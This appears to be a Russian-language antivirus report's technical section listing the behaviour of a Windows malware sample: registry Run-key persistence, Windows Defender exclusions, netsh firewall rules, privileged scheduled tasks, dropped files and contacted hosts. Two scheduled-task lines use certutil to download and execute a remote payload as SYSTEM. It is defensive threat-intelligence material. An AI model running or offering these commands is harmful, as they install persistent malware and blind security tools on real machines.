Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'CrimsonResonance' = '"%WINDIR%\rss\csrss.exe"'
- <SYSTEM32>\tasks\csrss
- <SYSTEM32>\tasks\scheduledupdate
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\rss' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%APPDATA%\8edad8e8feee\8edad8e8feee' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\csrss' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%APPDATA%\CrimsonResonance' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\windefender.exe' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\wup' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '<DRIVERS>' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes] 'csrss.exe' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes] '8edad8e8feee.exe' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes] 'windefender.exe' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes] '<Имя файла>.exe' = '00000000'
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="csrss" dir=in action=allow program="%WINDIR%\rss\csrss.exe" enable=yes
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="CloudNet" dir=in action=allow program="%APPDATA%\8edad8e8feee\8edad8e8feee\8edad8e8feee.exe" enable=yes
- %WINDIR%\rss\csrss.exe
- nul
- %TEMP%\csrss\patch.exe
- %TEMP%\dbghelp.dll
- %TEMP%\symsrv.dll
- %TEMP%\ntkrnlmp.exe
- %TEMP%\osloader.exe
- %TEMP%\symbols\ntkrnlmp.pdb\3844dbb920174967be7aa4a2c20430fa2\download.error
- %TEMP%\csrss\patch.exe
- '30###############0-8dec-bbd837cf291d.server1.easywbdesign.com':443
- 'msdl.microsoft.com':443
- 'vs###########ssu5shard10.blob.core.windows.net':443
- DNS ASK 30###############0-8dec-bbd837cf291d.server1.easywbdesign.com
- DNS ASK msdl.microsoft.com
- DNS ASK vs###########ssu5shard10.blob.core.windows.net
- '%WINDIR%\rss\csrss.exe' ""
- '%TEMP%\csrss\patch.exe'
- '<SYSTEM32>\cmd.exe' /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="%WINDIR%\rss\csrss.exe" enable=yes"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="%APPDATA%\8edad8e8feee\8edad8e8feee\8edad8e8feee.exe" enable=yes"' (со скрытым окном)
- '%WINDIR%\rss\csrss.exe' ""' (со скрытым окном)
- '<SYSTEM32>\schtasks.exe' /CREATE /SC ONLOGON /RL HIGHEST /TR "%WINDIR%\rss\csrss.exe" /TN csrss /F' (со скрытым окном)
- '<SYSTEM32>\schtasks.exe' /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe %TEMP%\csrss\scheduled.exe && %TEMP%\csrss\scheduled.exe /31340" ...' (со скрытым окном)
- '%TEMP%\csrss\patch.exe' ' (со скрытым окном)
- '<SYSTEM32>\bcdedit.exe' /v' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="%WINDIR%\rss\csrss.exe" enable=yes"
- '<SYSTEM32>\cmd.exe' /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="%APPDATA%\8edad8e8feee\8edad8e8feee\8edad8e8feee.exe" enable=yes"
- '<SYSTEM32>\schtasks.exe' /CREATE /SC ONLOGON /RL HIGHEST /TR "%WINDIR%\rss\csrss.exe" /TN csrss /F
- '<SYSTEM32>\schtasks.exe' /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe %TEMP%\csrss\scheduled.exe && %TEMP%\csrss\scheduled.exe /31340" ...
- '<SYSTEM32>\bcdedit.exe' /v